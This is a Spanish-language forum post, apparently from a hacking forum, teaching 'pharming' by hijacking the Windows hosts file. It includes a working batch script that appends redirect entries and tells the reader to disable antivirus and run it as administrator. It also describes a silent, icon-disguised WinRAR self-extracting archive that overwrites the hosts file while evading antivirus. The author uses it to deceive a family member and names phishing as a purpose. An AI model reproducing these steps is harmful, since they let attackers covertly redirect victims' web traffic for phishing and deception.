Pharming facil tres metodos diferentes

¿Que es el pharming? .- es un metodo de explotar un bug o vulnerabilidad en el software de un servidor DNS (Sistema de Nombre de Dominio) o en un equipo propio, lo que te permite redirigir un nombre de dominio tipo (www.google.com) a otra maquina distinta, de esta forma si alguien entrara en el una pagina sera redirigido a otra.
ejem.
                yo quiero entrar a www.google.com  el cual esta reedireccionado mediante pharming a otra web por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (trucos de algunos programas gratis).
este metodo es usado para posicionamiento web y phising con fines maleficos e interesantes

Metodo 1 autoinfeccion con bat
es simple abres un bloc de notas y modificas el host.

@echo off
echo [ip de la web a la que quieras reedireccionar] [url de la pagina que estara infectada] %windir%\System32\drivers\etc\hosts

bueno en mi caso infectare la pagina de registro de mi facultad para que mi padre no se entere de mis notas la web a la que no quiero que ingrese es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y su ip es 192.181.13.76, reedireccionare a la pagina de mi universidad para evitar sospechas No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y su ip 190.129.9.36, si no saben la ip de la pagina a reedireccionar basta con hacer un ping a la url.
obteniendo la ip de la pagina a reedireccionar
                                                                                   

paso 1 crear el bat en un bloc de notas y guardarlo con la extension .bat
el codigo quedaria asi

@echo off
echo 190.129.9.36 web.fni.edu.bo >>%windir%\System32\drivers\etc\hosts
echo 190.129.9.36 http://web.fni.edu.bo >>%windir%\System32\drivers\etc\hosts
echo 190.129.9.36 http://web.fni.edu.bo/fni/index.php >>%windir%\System32\drivers\etc\hosts
echo 190.129.9.36 fni.edu.bo >>%windir%\System32\drivers\etc\hosts
echo 190.129.9.36 web.fni.edu.bo/fni >>%windir%\System32\drivers\etc\hosts

luego lo ejecutamos
y listo obtuvimos lo esperado ya sea ingresando la url manualmente o ingresando con el primer resultado de google nos reedirecciona a la web que queremos

nota activar el bat desactivando el antivirus, en caso de w7, w8 ejecutar con permisos de administrador.

Metodo 2 pharming con winrar
vamos a inicio -> ejecutar (o la tecla windows+r) escribimos drivers y presionamos enter
entramos en etc y copiamos el archivo hosts
lo copiamos a escritorio y lo editamos en un editor de texto añadiendole al final

[ip de la pagina a reedireccionar] [url de la web infectada]
luego guardan el archivo "hosts" editado, ahora lo interesante con winrar
damos click con el boton derecho del raton y elegimos la opcion de añadir al archivo....

en general marcamos la opcion "crear un archivo autoextraible" en algunos casos se llama "crear un archivo SFX"
luego vamos a la pestaña de avanzado y presionamos la opcion "autoextraible" o "opciones de SFX"
y en la carpeta de autoextraccion escribimos "%windir%\system32\drivers\etc"
luego en la misma ventana vamos a la pestaña "Modos" y seleccionamos la opcion de "ocultar todo" y "omitir ficheros persistentes", en caso de que exista esa opción
caso contrario en la pestaña "avanzado" ticar la opcion de "sobreescribir todos los ficheros" y "extraer y reemplazar ficheros"
bueno existe más que se puede hacer, existe la pestaña de texto e icono ahi pueden elegir un icono de su preferencia que tenga la extension .ico para camuflar el autoextraible pero en mi caso no tengo necesidad de ello asi que acepto y acepto las modificaciones que realice, bueno ahora nos queda ejecutar el archivo creado y listo tenemos el mismo resultado del anterior metodo un poco mas complicado que el bat pero los antivirus no detectaran el autoextraible hasta que se ejecute, ademas de que el archivo creado en winrar no abre una ventana como el bat.
Nota.- mismos puntos del anterior metodo.


Tercer metodo pharming con Cain y Abel
el tercer metodo ya esta posteado por ANTRAX al cual pueden acceder mediante este link No tienes permitido ver los links. Registrarse o Entrar a mi cuenta esta bien explicado

Gracias por el aporte!